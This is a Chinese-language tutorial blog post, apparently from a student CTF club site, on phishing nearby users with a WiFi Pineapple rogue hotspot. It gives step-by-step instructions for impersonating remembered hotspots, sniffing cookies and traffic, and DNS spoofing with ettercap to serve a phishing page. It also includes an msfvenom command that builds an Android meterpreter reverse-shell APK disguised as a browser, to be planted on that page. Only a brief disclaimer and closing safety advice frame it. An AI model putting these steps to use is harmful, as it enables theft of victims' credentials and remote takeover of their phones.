您的足迹:首页 > 老司机小讲堂 >使用WifiPineApple 进行范围内 局域网钓鱼
  • 社团XSS平台 xss.klmyssn.com
  • 全国青少年信息技术社团联盟 lm.klmyssn.com
  • 全国中学生CTF论坛 bbs.klmyssn.com
  • 全国中学生CTF平台 ctf.klmyssn.com
  • 使用WifiPineApple 进行范围内 局域网钓鱼

    使用WifiPineApple 进行范围内 局域网钓鱼

     

    作者: W22

     

     

    声明:仅供参考,勿用于非法用途,否则后果自负,与作者无关。

     

    准备工作:

    1.WifiPineApple ,  可以在极客之眼的论坛上买一个汉化的。

    2.两张无线网卡(支持监听模式的功能) ,推荐RT3070L,便宜一些 如果有更大需求,可以买功率大一些的。

    3.一个USB集线器 ,因为PineApple上只有一个USB接口。

    4.KALI Linux 渗透操作系统。

     

     

    在进入正题之前,我们需要了解一下WiFiPineApple这个设备:

    WifiPineApple 有这么一个功能:PineAP,它的功能可谓是强大:可以自动模拟手机曾经连接过的热点,也就是通过手机内的/data/misc/wifi/wpa_supplicant.conf (存放手机记录的热点名称以及密码)文件, 来创建WiFi热点的名称,它创建带密码/不带密码的2种,从而导致,附近的其他用户 只要开启了WiFi ,就会自动连接到你的PineApple上。

     

    下边说明实验的步骤:

    0x01 连接PineApple: 

     

    打开PineApple,在设备的侧面有一个按钮,推到左侧是开启,右侧是充电宝模式,中间是关机。


    插入网线或连接建立的热点(一般开机后需要等待2分钟左右),使用web的方式登陆 PineApple的默认连接的地址为:http://172.16.42.1:1471



    输入账号密码登陆(厂商提供默认口令)

    我们看到以下的界面:



    0x02 配置网络(重点):

    在左侧的菜单栏中 选择网络



    在网络中我们可以看到当前网卡和IP地址获取的情况



    我们需要做的配置是:一块网卡用于建立PineAP热点,一块网卡用于桥接其他网络,连接外网。 还有一块网卡用于连接设备物理接口,和默认建立的wifi(不能动)

    最终达到这样的效果



    0x03 进行一些嗅探和欺骗

    PineApple中有很多的插件,都可以进行对连接上的客户机 ,做一些“手脚”,例如图片网址获取的功能 ,他可以获取到用户访问未被SSL加密的图片和一些网址的URL,请求时提交的数据和cookie等。

    当然,这些功能在KALI内手动进行实现 ,但是通过这个web的方式一键搭建,是不是很方便呢?



    0x04 通过KALI来手动进行dns劫持,并且伪造钓鱼网页

    1.启动KALI Linux虚拟机,并设置桥接网卡 我拿自己的有线网卡为例子

    菜单栏下的 编辑->虚拟网络编辑器,选择使用桥接网卡,并桥接到自己的物理设备(连接PineApple的设备)



    2.配置ip地址,或者等待dhcp自动分配

    3.可以ping通设备后,我们搭建一个web服务器 : service apache2 start

     

    4.将钓鱼页面放置 /var/www/html目录下

     

    5.接下来,我们启动ettercap 来进行dns欺骗 :

    配置ettercap文件: 

    Vim /etc/Ettercap/etter.dns



    修改为 所有的域名都指向 172.16.42.133 也就是KALI的地址

    6.启动ettercap  Ettercap -G

    Ctrl+U启动 网卡选择桥接到PineApple的网卡



    管理插件,并将dns欺骗功能启用



    7. 这时 用户访问的未加密的一些网页就会变成你的钓鱼页面,为了测试,做了一个简单的网页,

    当然,如果想要更好的效果的话 ,可以找一个真实性更好的网页进行测试。



    0x05 通过msf生成木马,远控手机或PC。

    msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.42.133 LPORT=5555 > ~/360浏览器.apk

     

    放在钓鱼页面上 ,等待用户“上钩”.  

    具体的用法 可以参考这篇文章

    附上我的几个成功的例子(在被允许的情况下)



    当然,不止有这些功能,有什么好的想法都可以去尝试一下,不过要适度哦。

     

     

    0x00 结语

    引用我说说里说的话:没有什么是绝对安全的,连接即使是曾经连接过的wifi和确定之前连接是安全的wifi 也是及其危险的,当攻击者伪造出你认为可靠的热点时,你连接了他,可能是主动去连接,也可能是被动去连接(wifi一直打开),就会造成信息的泄露,可能会透露你的个人信息:即使现在网络采用了SSL技术进行了加密传输 ,但是还是有相当一部分没有实现这项功能,所以,例如QQ号,还有网络浏览的一些信息以及照片 ,都可能被泄露 ,不重视网络安全,为了谋取一些利益的同时,忽视手机警告提示,甚至造成更严重的后果!! 例如:下载未知绑定了木马的app  可以被攻击者利用 获取短信信息(验证码),联系人(诈骗),甚至摄像头(威胁),所以要提高安全意识,不要在公共场合轻易的连接wifi,即使是你认为可靠的。

     

    本萌新技术水平有限,可能有些地方讲的不详细,希望大佬们可以理解一下 ,欢迎指出错误,随时修正并学习。


    相关推荐

  • 社团XSS平台 xss.klmyssn.com
  • 全国青少年信息技术社团联盟 lm.klmyssn.com
  • 全国中学生CTF论坛 bbs.klmyssn.com
  • 全国中学生CTF平台 ctf.klmyssn.com
  • 社团群号 487202411 广告位招租~

    发表评论

    路人甲 表情
    Ctrl+Enter快速提交

    网友评论(0)